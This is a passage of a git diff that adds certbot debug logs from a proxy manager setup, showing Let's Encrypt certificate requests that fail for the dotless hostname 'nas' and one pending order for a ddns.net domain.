^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ + File "/opt/certbot/lib/python3.11/site-packages/certbot/_internal/client.py", line 487, in _get_order_and_authorizations + orderr = self.acme.new_order(csr_pem, profile=profile) + ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ + File "/opt/certbot/lib/python3.11/site-packages/acme/client.py", line 141, in new_order + response = self._post(self.directory['newOrder'], order) + ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ + File "/opt/certbot/lib/python3.11/site-packages/acme/client.py", line 467, in _post + return self.net.post(*args, **kwargs) + ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ + File "/opt/certbot/lib/python3.11/site-packages/acme/client.py", line 818, in post + return self._post_once(*args, **kwargs) + ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ + File "/opt/certbot/lib/python3.11/site-packages/acme/client.py", line 833, in _post_once + response = self._check_response(response, content_type=content_type) + ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ + File "/opt/certbot/lib/python3.11/site-packages/acme/client.py", line 705, in _check_response + raise messages.Error.from_json(jobj) +acme.messages.Error: urn:ietf:params:acme:error:rejectedIdentifier :: The server will not issue certificates for the identifier :: Invalid identifiers requested :: Cannot issue for "nas": Domain name needs at least one dot +2025-12-25 00:26:23,662:ERROR:certbot._internal.log:An unexpected error occurred: +2025-12-25 00:26:23,662:ERROR:certbot._internal.log:Invalid identifiers requested :: Cannot issue for "nas": Domain name needs at least one dot diff --git a/proxy-manager/data/logs/letsencrypt.log.12 b/proxy-manager/data/logs/letsencrypt.log.12 new file mode 100755 index 0000000..8b068f1 --- /dev/null +++ b/proxy-manager/data/logs/letsencrypt.log.12 @@ -0,0 +1,137 @@ +2025-12-25 00:26:12,714:DEBUG:certbot._internal.main:certbot version: 5.1.0 +2025-12-25 00:26:12,714:DEBUG:certbot._internal.main:Location of certbot entry point: /opt/certbot/bin/certbot +2025-12-25 00:26:12,714:DEBUG:certbot._internal.main:Arguments: ['--config', '/etc/letsencrypt.ini', '--work-dir', '/tmp/letsencrypt-lib', '--logs-dir', '/data/logs', '--cert-name', 'npm-7', '--agree-tos', '--authenticator', 'webroot', '-m', 'kincses@gmail.com', '--preferred-challenges', 'http', '--domains', 'NAS'] +2025-12-25 00:26:12,714:DEBUG:certbot._internal.main:Discovered plugins: PluginsRegistry(PluginEntryPoint#manual,PluginEntryPoint#null,PluginEntryPoint#standalone,PluginEntryPoint#webroot) +2025-12-25 00:26:12,724:DEBUG:certbot._internal.log:Root logging level set at 30 +2025-12-25 00:26:12,725:DEBUG:certbot._internal.plugins.selection:Requested authenticator webroot and installer None +2025-12-25 00:26:12,725:DEBUG:certbot._internal.plugins.selection:Single candidate plugin: * webroot +Description: Saves the necessary validation files to a .well-known/acme-challenge/ directory within the nominated webroot path. A separate HTTP server must be running and serving files from the webroot path. HTTP challenge only (wildcards not supported). +Interfaces: Authenticator, Plugin +Entry point: EntryPoint(name='webroot', value='certbot._internal.plugins.webroot:Authenticator', group='certbot.plugins') +Initialized: +Prep: True +2025-12-25 00:26:12,725:DEBUG:certbot._internal.plugins.selection:Selected authenticator and installer None +2025-12-25 00:26:12,725:INFO:certbot._internal.plugins.selection:Plugins selected: Authenticator webroot, Installer None +2025-12-25 00:26:12,764:DEBUG:certbot._internal.main:Picked account: +2025-12-25 00:26:12,764:DEBUG:acme.client:Sending GET request to https://acme-v02.api.letsencrypt.org/directory. +2025-12-25 00:26:12,765:DEBUG:urllib3.connectionpool:Starting new HTTPS connection (1): acme-v02.api.letsencrypt.org:443 +2025-12-25 00:26:13,201:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "GET /directory HTTP/1.1" 200 1033 +2025-12-25 00:26:13,202:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Thu, 25 Dec 2025 00:26:13 GMT +Content-Type: application/json +Content-Length: 1033 +Connection: keep-alive +Cache-Control: public, max-age=0, no-cache +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "9ojpIDIRYvo": "https://community.letsencrypt.org/t/adding-random-entries-to-the-directory/33417", + "keyChange": "https://acme-v02.api.letsencrypt.org/acme/key-change", + "meta": { + "caaIdentities": [ + "letsencrypt.org" + ], + "profiles": { + "classic": "https://letsencrypt.org/docs/profiles#classic", + "shortlived": "https://letsencrypt.org/docs/profiles#shortlived", + "tlsclient": "https://letsencrypt.org/docs/profiles#tlsclient", + "tlsserver": "https://letsencrypt.org/docs/profiles#tlsserver" + }, + "termsOfService": "https://letsencrypt.org/documents/LE-SA-v1.6-August-18-2025.pdf", + "website": "https://letsencrypt.org" + }, + "newAccount": "https://acme-v02.api.letsencrypt.org/acme/new-acct", + "newNonce": "https://acme-v02.api.letsencrypt.org/acme/new-nonce", + "newOrder": "https://acme-v02.api.letsencrypt.org/acme/new-order", + "renewalInfo": "https://acme-v02.api.letsencrypt.org/acme/renewal-info", + "revokeCert": "https://acme-v02.api.letsencrypt.org/acme/revoke-cert" +} +2025-12-25 00:26:13,203:DEBUG:certbot._internal.display.obj:Notifying user: Requesting a certificate for nas +2025-12-25 00:26:13,209:DEBUG:acme.client:Requesting fresh nonce +2025-12-25 00:26:13,209:DEBUG:acme.client:Sending HEAD request to https://acme-v02.api.letsencrypt.org/acme/new-nonce. +2025-12-25 00:26:13,352:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "HEAD /acme/new-nonce HTTP/1.1" 200 0 +2025-12-25 00:26:13,353:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Thu, 25 Dec 2025 00:26:13 GMT +Connection: keep-alive +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: IijzadlSUG12gLy_rsd9fAwAqjoaHPXC5XG9PWEXqkZ7feNIuZ8 +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + + +2025-12-25 00:26:13,354:DEBUG:acme.client:Storing nonce: IijzadlSUG12gLy_rsd9fAwAqjoaHPXC5XG9PWEXqkZ7feNIuZ8 +2025-12-25 00:26:13,354:DEBUG:acme.client:JWS payload: +b'{\n "identifiers": [\n {\n "type": "dns",\n "value": "nas"\n }\n ]\n}' +2025-12-25 00:26:13,358:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/new-order: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICJJaWp6YWRsU1VHMTJnTHlfcnNkOWZBd0Fxam9hSFBYQzVYRzlQV0VYcWtaN2ZlTkl1WjgiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL25ldy1vcmRlciJ9", + "signature": "VJ3osIH74o48lDiKscw5z37DYgdDl_mv85nBPTYyWc4XU218FCbfbRG9OiVUWdPkC0-G0riC9HsbYeOZh7elbGyk7hp59YAjSgXmE7d_AqcpDvexXm1x_Ih4iBiwitIYFq5rIo0FPmGkp6Uj5eWv1d_3n9iPI1TCQ_74RIgxcKPVY--CiAHnT55-hDog55nWNY-ovfUlCM8OeO1VFphF4EK-Nyh95t8mCmMHFaWE0Ar7S9lHC9bHVtvADb6gSD2DuTSeVZDeMquLFGulQVTk4Q9jFq4gyNBCYXzJHLleaR72wEPoEnlVRJWLldYSRG9R2ip1Wz8DjPIkMPgOkIdJbQ", + "payload": "ewogICJpZGVudGlmaWVycyI6IFsKICAgIHsKICAgICAgInR5cGUiOiAiZG5zIiwKICAgICAgInZhbHVlIjogIm5hcyIKICAgIH0KICBdCn0" +} +2025-12-25 00:26:13,501:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/new-order HTTP/1.1" 400 187 +2025-12-25 00:26:13,502:DEBUG:acme.client:Received response: +HTTP 400 +Server: nginx +Date: Thu, 25 Dec 2025 00:26:13 GMT +Content-Type: application/problem+json +Content-Length: 187 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: GxwILcG0h_oBtuobwRE86nVrkyWYNNYTargy-Ehmktj5RrevJAs + +{ + "type": "urn:ietf:params:acme:error:rejectedIdentifier", + "detail": "Invalid identifiers requested :: Cannot issue for \"nas\": Domain name needs at least one dot", + "status": 400 +} +2025-12-25 00:26:13,503:DEBUG:certbot._internal.log:Exiting abnormally: +Traceback (most recent call last): + File "/opt/certbot/bin/certbot", line 7, in + sys.exit(main()) + ^^^^^^ + File "/opt/certbot/lib/python3.11/site-packages/certbot/main.py", line 18, in main + return internal_main.main(cli_args) + ^^^^^^^^^^^^^^^^^^^^^^^^^^^^ + File "/opt/certbot/lib/python3.11/site-packages/certbot/_internal/main.py", line 1850, in main + return config.func(config, plugins) + ^^^^^^^^^^^^^^^^^^^^^^^^^^^^ + File "/opt/certbot/lib/python3.11/site-packages/certbot/_internal/main.py", line 1562, in certonly + lineage = _get_and_save_cert(le_client, config, domains, certname, lineage) + ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ + File "/opt/certbot/lib/python3.11/site-packages/certbot/_internal/main.py", line 141, in _get_and_save_cert + lineage = le_client.obtain_and_enroll_certificate(domains, certname) + ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ + File "/opt/certbot/lib/python3.11/site-packages/certbot/_internal/client.py", line 526, in obtain_and_enroll_certificate + cert, chain, key, _ = self.obtain_certificate(domains) + ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ + File "/opt/certbot/lib/python3.11/site-packages/certbot/_internal/client.py", line 427, in obtain_certificate + orderr = self._get_order_and_authorizations(csr.data, self.config.allow_subset_of_names) + ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ + File "/opt/certbot/lib/python3.11/site-packages/certbot/_internal/client.py", line 487, in _get_order_and_authorizations + orderr = self.acme.new_order(csr_pem, profile=profile) + ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ + File "/opt/certbot/lib/python3.11/site-packages/acme/client.py", line 141, in new_order + response = self._post(self.directory['newOrder'], order) + ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ + File "/opt/certbot/lib/python3.11/site-packages/acme/client.py", line 467, in _post + return self.net.post(*args, **kwargs) + ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ + File "/opt/certbot/lib/python3.11/site-packages/acme/client.py", line 818, in post + return self._post_once(*args, **kwargs) + ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ + File "/opt/certbot/lib/python3.11/site-packages/acme/client.py", line 833, in _post_once + response = self._check_response(response, content_type=content_type) + ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ + File "/opt/certbot/lib/python3.11/site-packages/acme/client.py", line 705, in _check_response + raise messages.Error.from_json(jobj) +acme.messages.Error: urn:ietf:params:acme:error:rejectedIdentifier :: The server will not issue certificates for the identifier :: Invalid identifiers requested :: Cannot issue for "nas": Domain name needs at least one dot +2025-12-25 00:26:13,510:ERROR:certbot._internal.log:An unexpected error occurred: +2025-12-25 00:26:13,510:ERROR:certbot._internal.log:Invalid identifiers requested :: Cannot issue for "nas": Domain name needs at least one dot diff --git a/proxy-manager/data/logs/letsencrypt.log.13 b/proxy-manager/data/logs/letsencrypt.log.13 new file mode 100755 index 0000000..f5ccfe9 --- /dev/null +++ b/proxy-manager/data/logs/letsencrypt.log.13 @@ -0,0 +1,137 @@ +2025-12-25 00:22:14,973:DEBUG:certbot._internal.main:certbot version: 5.1.0 +2025-12-25 00:22:14,973:DEBUG:certbot._internal.main:Location of certbot entry point: /opt/certbot/bin/certbot +2025-12-25 00:22:14,973:DEBUG:certbot._internal.main:Arguments: ['--config', '/etc/letsencrypt.ini', '--work-dir', '/tmp/letsencrypt-lib', '--logs-dir', '/data/logs', '--cert-name', 'npm-6', '--agree-tos', '--authenticator', 'webroot', '-m', 'kincses@gmail.com', '--preferred-challenges', 'http', '--domains', 'NAS'] +2025-12-25 00:22:14,973:DEBUG:certbot._internal.main:Discovered plugins: PluginsRegistry(PluginEntryPoint#manual,PluginEntryPoint#null,PluginEntryPoint#standalone,PluginEntryPoint#webroot) +2025-12-25 00:22:14,983:DEBUG:certbot._internal.log:Root logging level set at 30 +2025-12-25 00:22:14,984:DEBUG:certbot._internal.plugins.selection:Requested authenticator webroot and installer None +2025-12-25 00:22:14,984:DEBUG:certbot._internal.plugins.selection:Single candidate plugin: * webroot +Description: Saves the necessary validation files to a .well-known/acme-challenge/ directory within the nominated webroot path. A separate HTTP server must be running and serving files from the webroot path. HTTP challenge only (wildcards not supported). +Interfaces: Authenticator, Plugin +Entry point: EntryPoint(name='webroot', value='certbot._internal.plugins.webroot:Authenticator', group='certbot.plugins') +Initialized: +Prep: True +2025-12-25 00:22:14,984:DEBUG:certbot._internal.plugins.selection:Selected authenticator and installer None +2025-12-25 00:22:14,984:INFO:certbot._internal.plugins.selection:Plugins selected: Authenticator webroot, Installer None +2025-12-25 00:22:15,021:DEBUG:certbot._internal.main:Picked account: +2025-12-25 00:22:15,022:DEBUG:acme.client:Sending GET request to https://acme-v02.api.letsencrypt.org/directory. +2025-12-25 00:22:15,023:DEBUG:urllib3.connectionpool:Starting new HTTPS connection (1): acme-v02.api.letsencrypt.org:443 +2025-12-25 00:22:15,458:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "GET /directory HTTP/1.1" 200 1033 +2025-12-25 00:22:15,459:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Thu, 25 Dec 2025 00:22:15 GMT +Content-Type: application/json +Content-Length: 1033 +Connection: keep-alive +Cache-Control: public, max-age=0, no-cache +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "1l3nqP4MWMY": "https://community.letsencrypt.org/t/adding-random-entries-to-the-directory/33417", + "keyChange": "https://acme-v02.api.letsencrypt.org/acme/key-change", + "meta": { + "caaIdentities": [ + "letsencrypt.org" + ], + "profiles": { + "classic": "https://letsencrypt.org/docs/profiles#classic", + "shortlived": "https://letsencrypt.org/docs/profiles#shortlived", + "tlsclient": "https://letsencrypt.org/docs/profiles#tlsclient", + "tlsserver": "https://letsencrypt.org/docs/profiles#tlsserver" + }, + "termsOfService": "https://letsencrypt.org/documents/LE-SA-v1.6-August-18-2025.pdf", + "website": "https://letsencrypt.org" + }, + "newAccount": "https://acme-v02.api.letsencrypt.org/acme/new-acct", + "newNonce": "https://acme-v02.api.letsencrypt.org/acme/new-nonce", + "newOrder": "https://acme-v02.api.letsencrypt.org/acme/new-order", + "renewalInfo": "https://acme-v02.api.letsencrypt.org/acme/renewal-info", + "revokeCert": "https://acme-v02.api.letsencrypt.org/acme/revoke-cert" +} +2025-12-25 00:22:15,460:DEBUG:certbot._internal.display.obj:Notifying user: Requesting a certificate for nas +2025-12-25 00:22:15,466:DEBUG:acme.client:Requesting fresh nonce +2025-12-25 00:22:15,466:DEBUG:acme.client:Sending HEAD request to https://acme-v02.api.letsencrypt.org/acme/new-nonce. +2025-12-25 00:22:15,610:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "HEAD /acme/new-nonce HTTP/1.1" 200 0 +2025-12-25 00:22:15,611:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Thu, 25 Dec 2025 00:22:15 GMT +Connection: keep-alive +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: GxwILcG0AD_6BXqPygFbMveOuqSkyCiMUeUVFAvrWZI2ElVq0Ng +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + + +2025-12-25 00:22:15,611:DEBUG:acme.client:Storing nonce: GxwILcG0AD_6BXqPygFbMveOuqSkyCiMUeUVFAvrWZI2ElVq0Ng +2025-12-25 00:22:15,612:DEBUG:acme.client:JWS payload: +b'{\n "identifiers": [\n {\n "type": "dns",\n "value": "nas"\n }\n ]\n}' +2025-12-25 00:22:15,616:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/new-order: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICJHeHdJTGNHMEFEXzZCWHFQeWdGYk12ZU91cVNreUNpTVVlVVZGQXZyV1pJMkVsVnEwTmciLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL25ldy1vcmRlciJ9", + "signature": "aJXimnOO7pSdAlG-4kI2bUUZur1O7B8TwxRG80y8nn30sdHmQvGJUANapSWrCeNO829809Id1OAWM9zyTkUc2fCqUvi2rchNuDQTRn9SkKLTF-il9YDATHln9_ntTx63_M1rpSd1Bc4C127E9kF_u0XhuOQwEX9-avrXX4IoIW5boT-UOBeTc99R7F-a44qwOygnAmm1kVsmEMhn3bDFq7zR433y8xZ3s0IOEdjwc0bBKRfyY7MSmfKd94CQOnsmwWl5Jihr0Thzb2PGrCNnPLrMZ5FJG03eFu_Dw1wHP6U5wX_AXwChJd62NtmJlLbCu38ZY4XJWWQfAU-AoZrj6w", + "payload": "ewogICJpZGVudGlmaWVycyI6IFsKICAgIHsKICAgICAgInR5cGUiOiAiZG5zIiwKICAgICAgInZhbHVlIjogIm5hcyIKICAgIH0KICBdCn0" +} +2025-12-25 00:22:15,759:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/new-order HTTP/1.1" 400 187 +2025-12-25 00:22:15,760:DEBUG:acme.client:Received response: +HTTP 400 +Server: nginx +Date: Thu, 25 Dec 2025 00:22:15 GMT +Content-Type: application/problem+json +Content-Length: 187 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: GxwILcG0ae-rlLzstdWaO22bjUruUT6uwpcxeklOj39FPgxhdl0 + +{ + "type": "urn:ietf:params:acme:error:rejectedIdentifier", + "detail": "Invalid identifiers requested :: Cannot issue for \"nas\": Domain name needs at least one dot", + "status": 400 +} +2025-12-25 00:22:15,761:DEBUG:certbot._internal.log:Exiting abnormally: +Traceback (most recent call last): + File "/opt/certbot/bin/certbot", line 7, in + sys.exit(main()) + ^^^^^^ + File "/opt/certbot/lib/python3.11/site-packages/certbot/main.py", line 18, in main + return internal_main.main(cli_args) + ^^^^^^^^^^^^^^^^^^^^^^^^^^^^ + File "/opt/certbot/lib/python3.11/site-packages/certbot/_internal/main.py", line 1850, in main + return config.func(config, plugins) + ^^^^^^^^^^^^^^^^^^^^^^^^^^^^ + File "/opt/certbot/lib/python3.11/site-packages/certbot/_internal/main.py", line 1562, in certonly + lineage = _get_and_save_cert(le_client, config, domains, certname, lineage) + ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ + File "/opt/certbot/lib/python3.11/site-packages/certbot/_internal/main.py", line 141, in _get_and_save_cert + lineage = le_client.obtain_and_enroll_certificate(domains, certname) + ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ + File "/opt/certbot/lib/python3.11/site-packages/certbot/_internal/client.py", line 526, in obtain_and_enroll_certificate + cert, chain, key, _ = self.obtain_certificate(domains) + ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ + File "/opt/certbot/lib/python3.11/site-packages/certbot/_internal/client.py", line 427, in obtain_certificate + orderr = self._get_order_and_authorizations(csr.data, self.config.allow_subset_of_names) + ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ + File "/opt/certbot/lib/python3.11/site-packages/certbot/_internal/client.py", line 487, in _get_order_and_authorizations + orderr = self.acme.new_order(csr_pem, profile=profile) + ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ + File "/opt/certbot/lib/python3.11/site-packages/acme/client.py", line 141, in new_order + response = self._post(self.directory['newOrder'], order) + ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ + File "/opt/certbot/lib/python3.11/site-packages/acme/client.py", line 467, in _post + return self.net.post(*args, **kwargs) + ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ + File "/opt/certbot/lib/python3.11/site-packages/acme/client.py", line 818, in post + return self._post_once(*args, **kwargs) + ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ + File "/opt/certbot/lib/python3.11/site-packages/acme/client.py", line 833, in _post_once + response = self._check_response(response, content_type=content_type) + ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ + File "/opt/certbot/lib/python3.11/site-packages/acme/client.py", line 705, in _check_response + raise messages.Error.from_json(jobj) +acme.messages.Error: urn:ietf:params:acme:error:rejectedIdentifier :: The server will not issue certificates for the identifier :: Invalid identifiers requested :: Cannot issue for "nas": Domain name needs at least one dot +2025-12-25 00:22:15,774:ERROR:certbot._internal.log:An unexpected error occurred: +2025-12-25 00:22:15,775:ERROR:certbot._internal.log:Invalid identifiers requested :: Cannot issue for "nas": Domain name needs at least one dot diff --git a/proxy-manager/data/logs/letsencrypt.log.14 b/proxy-manager/data/logs/letsencrypt.log.14 new file mode 100755 index 0000000..b065dff --- /dev/null +++ b/proxy-manager/data/logs/letsencrypt.log.14 @@ -0,0 +1,555 @@ +2025-12-25 00:05:39,572:DEBUG:certbot._internal.main:certbot version: 5.1.0 +2025-12-25 00:05:39,572:DEBUG:certbot._internal.main:Location of certbot entry point: /opt/certbot/bin/certbot +2025-12-25 00:05:39,572:DEBUG:certbot._internal.main:Arguments: ['--config', '/etc/letsencrypt.ini', '--work-dir', '/tmp/letsencrypt-lib', '--logs-dir', '/data/logs', '--cert-name', 'npm-5', '--agree-tos', '--authenticator', 'webroot', '-m', 'kincses@gmail.com', '--preferred-challenges', 'http', '--domains', 'Targetts.ddns.net'] +2025-12-25 00:05:39,572:DEBUG:certbot._internal.main:Discovered plugins: PluginsRegistry(PluginEntryPoint#manual,PluginEntryPoint#null,PluginEntryPoint#standalone,PluginEntryPoint#webroot) +2025-12-25 00:05:39,582:DEBUG:certbot._internal.log:Root logging level set at 30 +2025-12-25 00:05:39,583:DEBUG:certbot._internal.plugins.selection:Requested authenticator webroot and installer None +2025-12-25 00:05:39,583:DEBUG:certbot._internal.plugins.selection:Single candidate plugin: * webroot +Description: Saves the necessary validation files to a .well-known/acme-challenge/ directory within the nominated webroot path. A separate HTTP server must be running and serving files from the webroot path. HTTP challenge only (wildcards not supported). +Interfaces: Authenticator, Plugin +Entry point: EntryPoint(name='webroot', value='certbot._internal.plugins.webroot:Authenticator', group='certbot.plugins') +Initialized: +Prep: True +2025-12-25 00:05:39,583:DEBUG:certbot._internal.plugins.selection:Selected authenticator and installer None +2025-12-25 00:05:39,583:INFO:certbot._internal.plugins.selection:Plugins selected: Authenticator webroot, Installer None +2025-12-25 00:05:39,621:DEBUG:certbot._internal.main:Picked account: +2025-12-25 00:05:39,621:DEBUG:acme.client:Sending GET request to https://acme-v02.api.letsencrypt.org/directory. +2025-12-25 00:05:39,622:DEBUG:urllib3.connectionpool:Starting new HTTPS connection (1): acme-v02.api.letsencrypt.org:443 +2025-12-25 00:05:40,091:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "GET /directory HTTP/1.1" 200 1033 +2025-12-25 00:05:40,092:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Thu, 25 Dec 2025 00:05:40 GMT +Content-Type: application/json +Content-Length: 1033 +Connection: keep-alive +Cache-Control: public, max-age=0, no-cache +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "k1u_7EtCDpk": "https://community.letsencrypt.org/t/adding-random-entries-to-the-directory/33417", + "keyChange": "https://acme-v02.api.letsencrypt.org/acme/key-change", + "meta": { + "caaIdentities": [ + "letsencrypt.org" + ], + "profiles": { + "classic": "https://letsencrypt.org/docs/profiles#classic", + "shortlived": "https://letsencrypt.org/docs/profiles#shortlived", + "tlsclient": "https://letsencrypt.org/docs/profiles#tlsclient", + "tlsserver": "https://letsencrypt.org/docs/profiles#tlsserver" + }, + "termsOfService": "https://letsencrypt.org/documents/LE-SA-v1.6-August-18-2025.pdf", + "website": "https://letsencrypt.org" + }, + "newAccount": "https://acme-v02.api.letsencrypt.org/acme/new-acct", + "newNonce": "https://acme-v02.api.letsencrypt.org/acme/new-nonce", + "newOrder": "https://acme-v02.api.letsencrypt.org/acme/new-order", + "renewalInfo": "https://acme-v02.api.letsencrypt.org/acme/renewal-info", + "revokeCert": "https://acme-v02.api.letsencrypt.org/acme/revoke-cert" +} +2025-12-25 00:05:40,093:DEBUG:certbot._internal.display.obj:Notifying user: Requesting a certificate for targetts.ddns.net +2025-12-25 00:05:40,100:DEBUG:acme.client:Requesting fresh nonce +2025-12-25 00:05:40,100:DEBUG:acme.client:Sending HEAD request to https://acme-v02.api.letsencrypt.org/acme/new-nonce. +2025-12-25 00:05:40,255:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "HEAD /acme/new-nonce HTTP/1.1" 200 0 +2025-12-25 00:05:40,256:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Thu, 25 Dec 2025 00:05:40 GMT +Connection: keep-alive +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: fULB7aUJXsgdiDFJMgVaxkmBU1AnQK5qoB931VmrQf0n40_hCxQ +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + + +2025-12-25 00:05:40,256:DEBUG:acme.client:Storing nonce: fULB7aUJXsgdiDFJMgVaxkmBU1AnQK5qoB931VmrQf0n40_hCxQ +2025-12-25 00:05:40,257:DEBUG:acme.client:JWS payload: +b'{\n "identifiers": [\n {\n "type": "dns",\n "value": "targetts.ddns.net"\n }\n ]\n}' +2025-12-25 00:05:40,260:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/new-order: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICJmVUxCN2FVSlhzZ2RpREZKTWdWYXhrbUJVMUFuUUs1cW9COTMxVm1yUWYwbjQwX2hDeFEiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL25ldy1vcmRlciJ9", + "signature": "LHxEBie-zgglrEphUcgEO8lziYF-uSyRXGy0cbum-sRwwqf75I3A5vr-w3lyK8oIzXtH3g7CHN67-NP0fsGzqQLFprYNp6ex1M5R9FwurFgBasCmNppC9wULG4bkprzuPMKQuF0HVgLg0q0Ib3r8ijnb_u5jSFQopY8gVVKJ_SlqrDTgQC-paRKWG0ZWVibn9-iR1f7l8vk7hfCYFpgrvztROWoI6GikJIhkPZT97MPeyMC30vVDcQ08Imzip0ZUVLg-A8N_tTulBMT_IlxrY7dIZm7xJ2H5T035uJISot8_EuetawYvGHobPRZOMGw4esOb6RX_6rvqVyUrbPfY6A", + "payload": "ewogICJpZGVudGlmaWVycyI6IFsKICAgIHsKICAgICAgInR5cGUiOiAiZG5zIiwKICAgICAgInZhbHVlIjogInRhcmdldHRzLmRkbnMubmV0IgogICAgfQogIF0KfQ" +} +2025-12-25 00:05:40,455:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/new-order HTTP/1.1" 201 351 +2025-12-25 00:05:40,456:DEBUG:acme.client:Received response: +HTTP 201 +Server: nginx +Date: Thu, 25 Dec 2025 00:05:40 GMT +Content-Type: application/json +Content-Length: 351 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Location: https://acme-v02.api.letsencrypt.org/acme/order/2906438176/462365093426 +Replay-Nonce: fULB7aUJRTJroWzqU9GB_Gs6tc2ssTS9lrMIqN6QPdNJLjlnQZQ +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "status": "pending", + "expires": "2026-01-01T00:05:40Z", + "identifiers": [ + { + "type": "dns", + "value": "targetts.ddns.net" + } + ], + "authorizations": [ + "https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/632574996616" + ], + "finalize": "https://acme-v02.api.letsencrypt.org/acme/finalize/2906438176/462365093426" +} +2025-12-25 00:05:40,456:DEBUG:acme.client:Storing nonce: fULB7aUJRTJroWzqU9GB_Gs6tc2ssTS9lrMIqN6QPdNJLjlnQZQ +2025-12-25 00:05:40,456:DEBUG:acme.client:JWS payload: +b'' +2025-12-25 00:05:40,460:DEBUG:acme.client:Sending POST request to 